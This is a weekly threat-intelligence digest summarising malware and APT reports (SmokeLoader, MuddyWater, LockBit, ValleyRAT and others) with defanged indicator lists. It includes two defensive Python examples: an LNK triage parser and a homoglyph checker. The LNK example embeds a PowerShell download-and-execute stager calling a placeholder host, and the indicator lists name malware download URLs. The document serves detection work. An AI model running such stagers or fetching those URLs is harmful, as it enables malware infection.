This is a weekly threat intelligence report review from RST Cloud. This week, we analysed 59 threat intelligence reports and compiled a brief summary of each, along with the relevant metadata that was extracted. You can find below a short summary of 10 reports, related threats, tools, threat actors, a link to the source, and a number of extracted indicators of compromise (IoCs) from the original reports. More granular information, including TTPs, on all reports is available via RST Report Hub.
Title: XE Group: From Credit Card Skimming to Exploiting Zero-Days
Link: https://intezer.com/blog/research/xe-group-exploiting-zero-days/
Summary: XE Group is a cybercriminal organization active since at least 2013 that has shifted from credit card skimming to targeted information theft. Research by Intezer and Solis Security documents its exploitation of two zero-day vulnerabilities in the VeraCore software used in logistics, CVE-2024-57968 and CVE-2025-25181, to deploy ASPX webshells for persistent access to compromised systems. The group has shown considerable tactical adaptability, maintaining unauthorized access to at least one victim for over four years, and has extended its operations to supply chains in the manufacturing and distribution sectors, using obfuscated PowerShell scripts and remote access Trojans.
Threats: xegroup_group meterpreter_tool supply_chain_technique magecart_group aspxspy_shell snipr_tool netstat_tool
Indicators of compromise:
-------------------------
ip: 171[.]227[.]250[.]249, 123[.]20[.]29[.]193, 222[.]253[.]102[.]94, 222[.]253[.]102[.]94:7979
domain: xegroups[.]com, object[.]fm, hivnd[.]com, xework[.]com, paycashs[.]com, sexadult[.]com
url: https://hivnd[.]com/software/7z[.]exe
hash:
- sha256=884c394c7b3eb757ae57050ac2e6a75385a361555e8e4272de1a3cf24746eec7,
- md5=cb424b3be3cb35ec1349bd3e09c53cc4,
- sha256=ba2109b5a3ccebbc494ee93880b55640539c7d25b85bc12189f0c671ce473771,
- sha256=680b7e8ec8204975c5026bcbaf70f7e9620eacdd7bf72e5476d17266b4a7d316, md5=7abb73b7844f2308d9c62954e6e8b7fc, sha1=032dd95a1299f37aaa76318945e030eb7da94da9,
- sha256=322f8cd560d5e10e93af3ea6d3505c8de213f549e6627c3ef4664ed92ba55f56, sha1=84e7f4ff1f93a4297c2e2c4e54f14edb18396b60, md5=457d7e3a708d1b5c6a8d449e52064985,
- sha1=16db01fe25b0c09e18d13f38c88a4ead5d10e323, sha256=c564acd69efa62a5037931090bf70a6506419fdf59ec52f8d1ab0b15d861cc67, md5=339a79457a8cf3504312d394be3ece98,
- sha1=ede5ddb97b98d80440553b23dfc19fdb4adc7499, md5=7a9b5c3bb7dab0857ee2c2d71758eca3, sha256=38b2d52dc471587fb65ef99c64cb3f69470ddfdaa184a256aecb26edeff3553a,
- md5=7b5b7d96006fec70c2091e90fbf02b99, sha1=9e928a26aa3c0e6eb8e709fc55ea12dcf7e02ff9, sha256=013ccea1d7fc2aa2d660e900f87a3192f5cb73768710ef2eb9016f81df8e5c70
email: xecloud@icloud[.]com, xethanh@gmail[.]com, joyn[.]nguyen@gmail[.]com
Title: Unmasking: Technological Advancement and Evolution of MuddyWater in 2024
Link: https://www.gov.il/BlobFolder/reports/maddy_water_2024/en/ALERT_CERT_IL_W_1858.pdf
Summary: MuddyWater, an Iranian threat actor associated with the Ministry of Intelligence and Security (MOIS) since 2017, has been actively conducting cyber operations primarily targeting Israel and other nations in response to geopolitical events. Known for sophisticated spear-phishing campaigns in the Middle East, particularly against Israeli entities, the group employs a diverse malware arsenal, combining custom-developed tools and legitimate software for persistence and stealth. With tactics involving social engineering, COM Hijacking, and encrypted communication channels, MuddyWater showcases a strategic evolution in state-sponsored cyber activities, utilizing advanced techniques like DNS and HTTP-based backdoors while demonstrating adaptability in exploiting known vulnerabilities and legitimate infrastructure for ongoing access to sensitive data.
Threats: muddywater_group muddyrot anchorrat cannonrat neshta sad_c2_tool havoc com_hijacking_technique lolbin_technique spear-phishing_technique dll_sideloading_technique dllsearchorder_hijacking_technique blackout_rat blackpos venom_proxy_tool simplehelp_tool upx_tool go-socks5_tool pheonix treasurebox mythic_c2 chisel_tool
Indicators of compromise:
-------------------------
ip: 212[.]232[.]225[.]5, 157[.]20[.]182[.]102
domain: 1drv[.]business, magicallyday[.]com, ulpanim[.]wiki, spaziogroup[.]org
url: https://ulpanim[.]wiki/signup, https://ulpanim[.]wiki/order, https://ulpanim[.]wiki/contact, https://ulpanim[.]wiki/shop, https://ulpanim[.]wiki/detail, https://ulpanim[.]wiki/support1, https://ulpanim[.]wiki/support2, https://ulpanim[.]wiki/support3
hash:
- md5=97e844797181cd163b794529447219d3,
- md5=15022bda37f65f33cad2bb5bf84a3900,
- md5=283c87eaf43a3099217a6d6f01d9c4f3,
- md5=963b75b2a747eec611265a22582d38e2,
- md5=c3b990474c06086db4311c1553570174,
- md5=6e5451b250731fcb5713bd043f406bf1,
- md5=ac819c8e223c20df9bb9a80ab5c20e4a,
- md5=b15dd02164a9bb53356ba1d748301bf7,
- md5=50da52b517c708a0d409ba20fd00b10f,
- md5=7d5b1ae57599940faf51e0b38f4824bd,
- md5=f700378578df895e80c0dfeea68fe694,
- md5=297f77096dfb485641b4594c83b32a7c,
- md5=c4406f5fff870955af772d676a30a0cf,
- md5=25b6f3f4b13bc53dd4981915cdd95e33,
- md5=2f257ead7f42df4e9115ddab552e77e4,
- md5=c851e849c8442727eac69225203ee7f7,
- md5=d3e259a8caa7e23e89453a387caa3a15,
- md5=c1ef5f29c1811444e1e96c25e667f18d,
- md5=fd5b55c1b97bef7b4f3114d39984e597,
- md5=9077295f0eb9db45fc495a04637ee197,
- sha256=044365681b0e781292e79c19906f379b7c3e0d5a404b19b56ed7b447b75d1485,
- sha256=6f6869fe0d47ef2abbd30651f6348de3868e4e2f642e30f468bc8376ec30b150,
- sha256=153128c13808b275b6f00bda3a616ee6fbb26f21d9124b13ab6daf1c7e7ff48e
email:
Title: GetSmoked: UAC-0006 Returns With SmokeLoader Targeting Ukraine’s Largest State-Owned Bank
Summary: UAC-0006, a financially motivated group, is running phishing campaigns against PrivatBank in Ukraine. The lures are password-protected archives that deliver JavaScript, VBScript and LNK files, with SmokeLoader handling payload execution and command-and-control communication. The report lists SHA256 hashes for the malicious files, which are themed as payment instructions and passport scans, and describes the email pretexts used to get recipients to open them. The group has added LNK files that run PowerShell to fetch and execute a payload from its C2 servers, tradecraft that overlaps with FIN7 and other Russian APT groups; the campaign puts credentials, sensitive data and brand trust at risk and exposes downstream supply-chain partners.
Threats: getsmoked_campaign uac-0006_group smokeloader process_injection_technique carbanak_group empiremonkey_group blackbasta credential_harvesting_technique supply_chain_technique spear-phishing_technique
Indicators of compromise:
-------------------------
ip: 94[.]156[.]177[.]51, 89[.]23[.]107[.]219, 109[.]70[.]26[.]37
domain: connecticutproperty[.]ru, constractionscity1991[.]lat, restructurisationservice[.]ru, spotcarservice[.]ru, 3-zak-media[.]de, cityutl[.]ru
url: http://89[.]23[.]107[.]219/privat[.]exe, http://3-zak-media[.]de/temp/paxynok_privatbank_06_01_2025p[.]zip, http://3-zak-media[.]de/temp/gate[.]php, http://89[.]23[.]107[.]219/invoce[.]pdf, http://89[.]23[.]107[.]219/final[.]mp4, http://spotcarservice[.]ru/fdjskf88cvt/invoce[.]pdf, http://spotcarservice[.]ru/fdjskf88cvt/invoce2[.]pdf, http://spotcarservice[.]ru/fdjskf88cvt/putty1[.]exe, http://spotcarservice[.]ru/fdjskf88cvt/yumba/putty[.]exe, http://3-zak-media[.]de/krayer-buergerschaft/Web/bilder/putty1[.]exe, http://cityutl[.]ru/download/pax[.]pdf, http://cityutl[.]ru/download/putty[.]exe
hash:
- sha256=5a0b48ccc1a353c4ace5e9626f17622611432a016577797d4c891ca945ffa7f8,
- sha256=80c450570cd338a594546f9e6c189ffc2a849d3bac3759c53592af30840ffb90,
- sha256=e0c57518aeef787bcf7cc13484486cfa48458bdf6b0baee02598e777a3ef83f2,
- sha256=ca90047f4c8b5c6628e38f11c1b3411ac8f0040a2d72e35c1a37de1d9a127131,
- sha256=dada50182ca98f75e0055f9b4a47d8ef3a6dda5c126cac309467c02257f3c1c0,
- sha256=119b79b9cdb773dc951c36fe35ea0237e5f035bda6493103399e3697dc929c3d,
- sha256=21bbe1929d20c5525349dabe58748798f9cdaa1abd25f13dc98b4c0b8ffdde23,
- sha256=31ba8ceffe689b570dc696c97291780288f16a15f91d3e55bf13d7dcdf3858a9,
- sha256=3216f4728788cc9a0416290d31a2fdc97bcd3f028582efc52dc1cd8208f0cebd,
- sha256=38eb41eebbc889d046d354de345cf7c073971f62c2aaf53163ecefb7914273cc,
- sha256=3998a0d2e96417ce234a79897df8bcb879295043ce3d7f188c7b3de7375b26e5,
- sha256=3bfb1a880ea62bb4ad24e98a3a641b85e2392942af59727701c57ed094e5554e,
- sha256=4a559be38d60d64cb378643cc4332f40fe94d5f6c4f71a4f593e4efcd918349c,
- sha256=4abf59022d70abac175ddd896e4d709d256ca56a7a9dd8a9805eb5f2af490576,
- sha256=527a4b00fc95ecb9c1308ccc4ebd6bac7c03053e8ed11cdeb08ac3a6af8775c3,
- sha256=5b259a3ce6c0ce88690eb15d71162a930f267d960e26e88d37c92403d747f44a,
- sha256=6d29acbbaf0c75eca458e3936dea7d20fceca415b897573b704d151c7e9261b8,
- sha256=75f20c4171c699a991c45671b46174b0879e1fcf83ee4cdc63af8d6a833698b3,
- sha256=7c3a1bbbcbd2a328d8fb70efbdc55efaeb23b8511955109facef5c6c20350afb,
- sha256=8a6466093bc38a5d075148fde75952372ab5d7bb991b74773d5e019e0e0145f0,
- sha256=993518e45c78f9cc19daefbabef980e2e16a5e2fa11036f1e98c6446efb38676,
- sha256=9aad92a2d4b310a344f102436f12d29c7ac635478918874181a18182e4f530b4,
- sha256=a2b10deef491ec1430f65157a411a47de0e9ad1431518b2fa4fe5f18a4f3e2bd,
- sha256=b62d21ec1f54e7f7d343bc836e87a13adf9f40f87fc54a7d3788baea9a2c2b08,
- sha256=b815638024caac8bb7e482465564ec2a091f2af52cbf635be268e9093cbc4e92,
- sha256=bfc7164ed334044c780f0f15b56b559dfabbb0007ba268c180a281ac5bcc1f19,
- sha256=cd8dc77de5811a6a215e74cf61b3c34fcf28d5a05df5e4fc26fc9ad2ee72868b,
- sha256=d143873322c13496b2fc580c07fead99c1679afe831202913cee522d88ff7795,
- sha256=d35cd24668474580161008eb655ce979400e382a58f0e6967b10a4d86343b6ec,
- sha256=ee5a55588bbdfe6749da1962a9b7d1b29a87a10a324347070edd9e8ec33f7c82,
- sha256=f1d97e23cb0820e851d457dbb930576890e5bc6313cdf30d09f160cbdcdac90f,
- sha256=f4222b240f88d43e6c63b9d9c09d93c10ba882b91fc4a61c0cd833f7c79b4c44,
- sha256=f72f2e0f0873885313dbde954f26acd1c02ed963512111b3f00cf7e9cd6e5e6d,
- sha256=e8b08cb0774145ac432406f5e579aabaddb485ad29ba7d1eb1c5fb3000c5eefa,
- sha256=7722151293bdc50640c719a55438ffd663a3d2bccc70392cdce8052b651afea0,
- sha256=9833cbd22fd50181f8939114920e883bacf8d727337f5dcdf4450d0312eca188,
- sha256=a3aac43dd6a592c9ec58121a09c8cd22fb1b2d05ca1ff91259e43565d5e33022,
- sha256=97fe6b08d8a40c1f6990ca5c7405fdc98e014cf1fdfc2646580bffd34c1160ec,
- sha256=476a8e2d8eae4d2315e719bf67be312c5e88476509bdbac2dffee48986ad54c1,
- sha256=0a898f1df135d52ef5006f8dba9e9fce4ab4a85e07a9417f39c7612113eb6210,
- sha256=1043ce610dd6e8b0cda635dbe1f15524c25d816f89ad22f9bc34403ef8e771cc,
- sha256=107190bb8f28ed2bb2f0883ae1fbfe0e50cacc54c17dc526c865f6f46f40107a
email:
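The LNK-to-PowerShell delivery described above is worth triaging at scale: the shortcut's target and argument strings can be pulled straight from the Shell Link (MS-SHLLINK) format without opening the file on Windows. The Python below is an added example, not code from the report or from RST Cloud; the .lnk it parses is constructed inside the block (the c2.invalid host and the putty.exe name are placeholders, not indicators from the campaign), and the regex list is a starting set of stager patterns, not a complete signature.

```python
"""Triage a Windows .lnk lure for embedded PowerShell download-and-execute commands.

Parses the ShellLinkHeader and StringData sections (MS-SHLLINK) to pull out the
target path and command-line arguments, then scans them for patterns typical of
PowerShell stagers.  The sample .lnk is constructed here for illustration; it is
not one of the campaign's files.
"""
import re
import struct

# LinkCLSID {00021401-0000-0000-C000-000000000046}, as laid out on disk
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C

# LinkFlags bits that decide which optional structures follow the header
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData entries appear in this fixed order, each only if its flag is set
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Indicators of a PowerShell stager: (regex, label).  Starting set, not exhaustive.
SUSPICIOUS = (
    (r"(?i)\bpowershell(\.exe)?\b", "invokes PowerShell"),
    (r"(?i)(^|\s)-(e|ec|en|enc|encodedcommand)\b", "encoded command"),
    (r"(?i)(^|\s)-w(indowstyle)?\s+hidden\b", "hidden window"),
    (r"(?i)\b(iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile|start-bitstransfer)\b", "downloader"),
    (r"(?i)\b(iex|invoke-expression)\b", "Invoke-Expression"),
    (r"(?i)https?://", "remote URL"),
)


def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields of a .lnk as {field: str}."""
    if (len(data) < HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (u16) + ItemIDList, skipped
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (u32) includes itself, skipped
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, not bytes
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def triage_lnk(data: bytes) -> list:
    """Return the labels of suspicious patterns found in the .lnk strings."""
    text = " ".join(parse_lnk_strings(data).values())
    return [label for pattern, label in SUSPICIOUS if re.search(pattern, text)]


def build_sample_lnk(relative_path: str, arguments: str) -> bytes:
    """Construct a minimal Unicode .lnk carrying only RELATIVE_PATH and ARGUMENTS."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (HEADER_SIZE - len(header))   # attributes, timestamps etc. zeroed
    body = b""
    for s in (relative_path, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


# Constructed lure: a shortcut that runs a PowerShell stager.
# c2.invalid is a placeholder host, not an indicator from the report.
SAMPLE_TARGET = r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_ARGS = ('-w hidden -nop -c "iwr http://c2.invalid/putty.exe -OutFile '
               r'$env:TEMP\p.exe; Start-Process $env:TEMP\p.exe"')

if __name__ == "__main__":
    sample = build_sample_lnk(SAMPLE_TARGET, SAMPLE_ARGS)
    for field, value in parse_lnk_strings(sample).items():
        print(f"{field}: {value}")
    print("verdict:", triage_lnk(sample))
```

The parser skips the LinkTargetIDList and LinkInfo structures rather than decoding them, so a lure whose only interesting content is the IDList target (no RELATIVE_PATH or ARGUMENTS strings) yields an empty result; add an ItemID walk before relying on it for automated verdicts.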
Title: LockBit — Persistent TTPs in the Larger Ecosystem
Link: https://redsense.com/publications/lockbit-persistent-ttps-in-larger-ecosystem
Summary: LockBit, the ransomware operation whose infrastructure was seized by international law enforcement nearly a year ago, continues to shape the threat landscape. It evolved from ABCD ransomware in 2019 to LockBit 3.0 and distributed a builder that lets affiliates and others generate customised ransomware variants. Since the takedown, independent actors have reused LockBit's tooling and tactics for data exfiltration, lateral movement and defence evasion, and this decentralised reuse, together with alliances with other threat groups, sustains the risk of LockBit-based attacks across many sectors.
Threats: lockbit lockbit_group exmatter_tool zeon conti credential_dumping_technique hellokitty blackcat blacksuit_ransomware avaddon revil avos_group national_hazard_agency_group bl00dy_group 3am_ransomware citrix_bleed_vuln akira_ransomware ransomhub Trojan.Win32.Inject.aokvy uac_bypass_technique cobalt_strike mimikatz_tool pchunter_tool process_hacker_tool gmer_tool 0ktapus_group luminati_tool domain_fronting_technique brc4_tool
Indicators of compromise:
-------------------------
ip: 198[.]199[.]74[.]168, 198[.]199[.]82[.]43, 159[.]89[.]236[.]37, 104[.]248[.]23[.]242, 89[.]203[.]223[.]42, 198[.]199[.]74[.]168:22, 198[.]199[.]74[.]168:80, 198[.]199[.]74[.]168:443, 198[.]199[.]82[.]43:22, 198[.]199[.]82[.]43:25, 198[.]199[.]82[.]43:53, 198[.]199[.]82[.]43:80, 198[.]199[.]82[.]43:443, 198[.]199[.]82[.]43:3389, 198[.]199[.]82[.]43:5432, 104[.]248[.]23[.]242:22, 104[.]248[.]23[.]242:25, 104[.]248[.]23[.]242:53, 104[.]248[.]23[.]242:80, 104[.]248[.]23[.]242:443, 104[.]248[.]23[.]242:3389, 104[.]248[.]23[.]242:5432, 159[.]89[.]236[.]37:22, 159[.]89[.]236[.]37:25, 159[.]89[.]236[.]37:53, 159[.]89[.]236[.]37:80, 159[.]89[.]236[.]37:443, 159[.]89[.]236[.]37:3389, 159[.]89[.]236[.]37:5432
domain: exploit[.]in, realmigrator[.]com
url:
hash:
- sha1=7c67976bfc3ef3c673d5cabc60b7f6fbe0ab19dc
email:
Title: Rat Race: ValleyRAT Malware Targets Organizations with New Delivery Techniques
Link: https://www.morphisec.com/blog/rat-race-valleyrat-malware-china
Summary: Morphisec Threat Labs has analysed ValleyRAT, a multi-stage remote access Trojan attributed to the Silver Fox APT, which has adapted its delivery by reusing a single URL across successive attack iterations. The malware is distributed through phishing emails and lookalike websites and targets finance and accounting staff in particular. The infection chain starts when a user downloads a counterfeit Chrome browser and runs a file that triggers the loader, which uses DLL search order hijacking to get its payload executed inside legitimate applications. ValleyRAT, written in C++, includes keylogging and covert communication with its external command-and-control addresses, and uses techniques that tamper with security mechanisms to avoid detection.
Threats: valleyrat silver_fox_group dllsearchorder_hijacking_technique dll_hijacking_technique dll_sideloading_technique apc_injection_technique process_hollowing_technique donut
Indicators of compromise:
-------------------------
ip: 149[.]115[.]250[.]19, 8[.]217[.]244[.]40, 154[.]82[.]85[.]79, 118[.]107[.]44[.]219, 43[.]250[.]172[.]42, 202[.]146[.]222[.]208, 103[.]183[.]3[.]10
domain:
url: https://anizom[.]com, https://karlost[.]club
hash:
- sha256=968b976167b453c15097667b8f4fa9e311b6c7fc5a648293b4abd75d80b15562,
- sha256=311f2d4ef2598e4a193609c3cd47bf4ff5fb88907026946ecffe6b960d43d5b2,
- sha256=51a9d06359952f6935619e8cf67042d2cec593788c324b72cffc0d34b1762bb0,
- sha256=53a6735ce1eca68908c0367152a1f8f3ca62b801788cd104f53d037811284d71,
- sha256=6ed466a2a6eeb83d1ff32ba44180352cf0a9ccc72b47e5bd55c1750157c8dc4c,
- sha256=a87745682da20ddfd6eac7ff2d27fec73ff56c6e9b4438121dcb6ba699c5cb3c,
- sha256=1db77692eaf4777f69ddf78c52424d81834572f1539ccea263d86a46f28e0cea,
- sha256=3989f7fa8d1d59ebc6adea90e3958a892b47d94268bf9d5c9c96811f3fb65b00,
- sha256=7c2a1b09617566ff9e94d0b1c15505213589f7fd3b445b334051d9574e52e0f5,
- sha256=bb89e401560ba763d1c5860dd51667ba17768c04d00270bf34abebac47fd040e
email:
Title: CVE-2025-0411: Ukrainian Organizations Targeted in Zero-Day Campaign and Homoglyph Attacks
Link: https://www.trendmicro.com/en_us/research/25/a/cve-2025-0411-ukrainian-organizations-targeted.html
Summary: The Trend Micro Zero Day Initiative (ZDI) threat hunting team identified a zero-day in the 7-Zip archiver, CVE-2025-0411, exploited in a SmokeLoader campaign against Ukrainian organizations amid regional tensions. The flaw is that 7-Zip did not propagate the Windows Mark-of-the-Web to files extracted from a nested archive, so a payload delivered in an archive inside another archive ("double archiving") arrives without the Zone.Identifier stream that would otherwise trigger SmartScreen and Protected View. The attackers combined this with homoglyph file names that mislead users about file types and delivered the archives through spear-phishing, compromising government and civilian targets in Ukraine, particularly smaller local government bodies with weaker defenses.
Threats: homoglyph_technique smokeloader motw_bypass_technique spear-phishing_technique credential_harvesting_technique
Indicators of compromise:
-------------------------
ip: 185[.]156[.]72[.]78
domain: api-mirosoft[.]com, xn--api-mirosoft-ehk[.]com, alfacentarusmulticopter[.]ru, johnfabiconinteraption[.]ru, storeagroculturnaya[.]ru, unicalads[.]ru, lazaretmed[.]pw, technoads[.]pw, oncomnigos[.]online, southlander[.]ru, goodmastersportunicum[.]ru, ukr-netfilediscdownloadapplication[.]ru
url: http://alfacentarusmulticopter[.]ru/index[.]php, http://johnfabiconinteraption[.]ru/index[.]php, http://storeagroculturnaya[.]ru/index[.]php, http://unicalads[.]ru/index[.]php, http://lazaretmed[.]pw/index[.]php, http://technoads[.]pw/index[.]php, http://oncomnigos[.]online/index[.]php, http://185[.]156[.]72[.]78/MyFolder/pay[.]zip, http://southlander[.]ru/dklfhgjdfhgjd78khdgfjgh/akt[.]bat, http://goodmastersportunicum[.]ru/load/svc[.]exe, http://ukrnetfilediscdownloadapplication[.]ru/file/download/68523654563845638465384585863874653786587365934/AKT_PAX_26_09_2024p[.]rar, https://ukrnetfilediscdownloadapplication[.]ru/file/download/68523654563845638465384585863874653786587365934/AKT_PAX_26_09_2024p[.]rar
hash:
- sha256=ba74ecae43adc78efaee227a0d7170829b9036e5e7f602cf38f32715efa51826,
- sha256=84ab6c3e1f2dc98cf4d5b8b739237570416bb82e2edaf078e9868663553c5412,
- sha256=7786501e3666c1a5071c9c5e5a019e2bc86a1f169d469cc4bfef2fe339aaf384,
- sha256=2e33c2010f95cbda8bf0817f1b5c69b51c860c536064182b67261f695f54e1d5,
- sha256=888f68917f9250a0936fd66ea46b6c510d0f6a0ca351ee62774dd14268fe5420,
- sha256=a059d671d950abee93ef78a170d58a3839c2a465914ab3bd5411e39c89ae55a2,
- sha256=554d9ddd6fd1ccb15d7686c8badb8653323c71884c7f20efb19b56324ff34fc1,
- sha256=54678013c8741db3340960e54ba93001c27619ead5cf5cc2eafd4c0fcf797ae6,
- sha256=62eb856a5f646c2883a3982f15c3eb877641f9e69783383ce8a73c688eccd543,
- sha256=cd123c288f623878218be31125000441bb8c5447375af67bc3c1d27d16eb5f8c,
- sha256=8ee225bdd38cf6fd014a16beb9e33a0650147a9b7ea2104afe2f47c01bd1db0b,
- sha256=b3df042c5286fa91a4555e105038364bc66bfe7fdfe3769eb26b96e0ffe6096b,
- sha256=915b73a57aaf759fbd5352d79656e1b697545e6c9d953ab05aacf61ed4f6e397,
- sha256=d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21,
- sha256=fdfbdd42944c9e3b9697a8d8375e4e5cfd45c86941aa3f8f6dd0d08607b73144,
- sha256=5c7d582ba61ac95fb0d330ecc05feeb4853ac1de1f5a6fd12df6491dd0b7ea34
email:
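The homoglyph side of this campaign is visible in the indicator list itself: xn--api-mirosoft-ehk[.]com is the punycode form of a domain in which a Cyrillic letter stands in for a Latin one. The Python below, an added example rather than code from Trend Micro or RST Cloud, decodes such labels, reduces them to a Latin "skeleton" using a small hand-built confusables table (a subset of Unicode UTS #39, labelled as such in the code), flags mixed scripts, and applies the same check to attachment names. The WATCHLIST brands and the Rahunok.рdf file name are constructed for the demonstration. It does not cover the Mark-of-the-Web half of the chain, which needs a Windows host to inspect the Zone.Identifier stream on extracted files.

```python
"""Flag homoglyph (confusable-character) lookalikes in domains and file names.

Decodes punycode labels, maps each character to the Latin letter it is commonly
confused with, and compares the result ("skeleton") against a brand watchlist.
The confusables table is a small hand-built subset of Unicode UTS #39, not the
full data set; extend it before production use.
"""
import unicodedata

# Common Cyrillic/Greek lookalikes -> Latin (constructed subset of UTS #39 confusables)
CONFUSABLES = {
    "\u0430": "a", "\u0441": "c", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0455": "s", "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0458": "j",
    "\u04bb": "h", "\u0501": "d", "\u051b": "q", "\u051d": "w",
    "\u03bf": "o", "\u03b1": "a", "\u03bd": "v",
    "\u0131": "i",                                 # dotless i
    "\u2010": "-", "\u2011": "-", "\u2013": "-",   # dash variants
}

# Brands to protect; constructed for this example
WATCHLIST = ("microsoft", "privatbank", "ukr.net")


def to_unicode(name: str) -> str:
    """Refang a domain or file name and decode any punycode (xn--) labels."""
    labels = []
    for label in name.replace("[.]", ".").split("."):
        if label.lower().startswith("xn--"):
            label = label[4:].encode("ascii").decode("punycode")
        labels.append(label)
    return ".".join(labels)


def skeleton(text: str) -> str:
    """Reduce a string to the Latin characters it visually resembles."""
    text = unicodedata.normalize("NFKC", text)
    return "".join(CONFUSABLES.get(ch, ch) for ch in text)


def scripts(text: str) -> set:
    """Unicode script names (taken from character names) of the letters in text."""
    return {unicodedata.name(ch, "UNKNOWN").split(" ")[0] for ch in text if ch.isalpha()}


def analyse(name: str) -> dict:
    """Decode, skeletonize and classify one domain or file name."""
    decoded = to_unicode(name)
    skel = skeleton(decoded)
    substituted = [unicodedata.name(ch) for ch in decoded if ch in CONFUSABLES]
    mixed = len(scripts(decoded)) > 1
    # A brand that appears only after confusables are folded is being impersonated
    brand = next((b for b in WATCHLIST if b in skel and b not in decoded), None)
    return {
        "input": name,
        "decoded": decoded,
        "skeleton": skel,
        "mixed_script": mixed,
        "substituted": substituted,
        "impersonates": brand,
        "suspicious": mixed or bool(substituted) or brand is not None,
    }


if __name__ == "__main__":
    # The punycode domain from the indicator list, plus constructed comparison cases
    for candidate in ("xn--api-mirosoft-ehk[.]com", "api-mirosoft[.]com",
                      "example.com", "Rahunok.\u0440df"):
        r = analyse(candidate)
        print(f"{r['input']:<30} -> {r['skeleton']:<20} suspicious={r['suspicious']} "
              f"mixed={r['mixed_script']} substituted={r['substituted']} brand={r['impersonates']}")
```

Note the limit this exposes: api-mirosoft[.]com passes the check, because it is a typosquat (a dropped letter, all Latin) rather than a homoglyph; catching it needs an edit-distance comparison against the watchlist, which this example deliberately leaves out.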
Title: SmokeLoader Malware Found in Open Directories Targeting Ukraine's Auto & Banking Industries
Summary: Recent research has identified open directories hosting SmokeLoader malware samples, specifically targeting Ukraine's automotive and banking sectors. Discovered on two misconfigured servers in Poland and Ukraine, the malware utilizes various financial-themed lure documents, such as fabricated invoices and account statements, to increase user interaction and compromise systems. SmokeLoader, initially recognized in 2011 and often associated with suspected Russian threat actors, serves to gain initial system access before deploying additional malicious payloads. The operational behavior of SmokeLoader observed during the research, including its injection into the explorer.exe process and communication with command-and-control servers, underscores the ongoing threat posed by cyberattacks targeting Ukrainian organizations, particularly through adaptable and financially motivated tactics.
Threats: smokeloader
Indicators of compromise:
-------------------------
ip: 2[.]59[.]163[.]172, 2[.]59[.]163[.]72, 88[.]151[.]192[.]50, 94[.]156[.]177[.]72:80, 2[.]59[.]163[.]71:80, 94[.]156[.]177[.]72, 66[.]63[.]187[.]25, 88[.]151[.]192[.]71
domain: www[.]connecticutproperty[.]ru, downloadmanager[.]ru, oncomnigos[.]ru, consultationoffice[.]ru, www[.]spotcarservice[.]ru, www[.]fileexportinc[.]ru, restructurisationservice[.]ru, fileexportinc[.]ru, constractionscity1991[.]lat, ns2[.]constractionscity1991[.]lat
url: http://constractionscity1991[.]lat, http://restructurisationservice[.]ru, http://connecticutproperty[.]ru
hash:
- sha256=9833cbd22fd50181f8939114920e883bacf8d727337f5dcdf4450d0312eca188,
- sha256=f8bd5f0408409ea63a270d5aad8da5f0cb557f9a82e0da3e8077cbe589288054,
- sha256=1118a93cc63a70ba8348182f7012ddbeecf890345941c82376ac967faf55a295,
- sha256=4b00565a29eeb0446393d0538e8f24de232339cf3ffb6a76a2bce3ba160c2066,
- sha256=5e7602b9073b8cf5c1a6afc6d0c8366545da65d2b48eb109f1bd9f40a58e73c0,
- sha256=7991bfff4eb5f50aa9f5d3d95064411987a29de9621fc5afca9e4978ca568941
email:
Title: Premium Panel: phishing tool used in longstanding campaigns worldwide
Link: https://www.intrinsec.com/wp-content/uploads/2025/01/TLP-CLEAR-Live-Control-Panel-Premium-EN.pdf
Summary: The "Premium panel" phishing toolkit is a framework for logging credentials and redirecting victims to counterfeit login pages, mostly of banks and logistics firms in Western countries as well as Saudi Arabia and South Africa. It has been in use for more than two years; shared IP addresses across many phishing domains point to a single operator, and pages aimed at organisations in Cyprus and Hungary have been observed. A central script, processor.php, keeps the victim's browser connected to the panel and handles the redirections, which is what makes the campaigns effective. Historical domain-registration records link the email addresses used to register the phishing domains, which may help trace the groups behind them. The infrastructure relies on compromised legitimate websites and temporary hosting domains, which makes the kit easy to redeploy and keeps phishing of the financial sector likely to continue.
Threats: premium_panel_tool mitm_technique geral
Indicators of compromise:
-------------------------
ip: 139[.]177[.]180[.]48, 87[.]121[.]22[.]102, 87[.]121[.]22[.]214, 2[.]59[.]255[.]11, 20[.]100[.]169[.]28, 185[.]221[.]67[.]30, 45[.]55[.]112[.]74
domain: cloudwayapps[.]com, tempurl[.]host
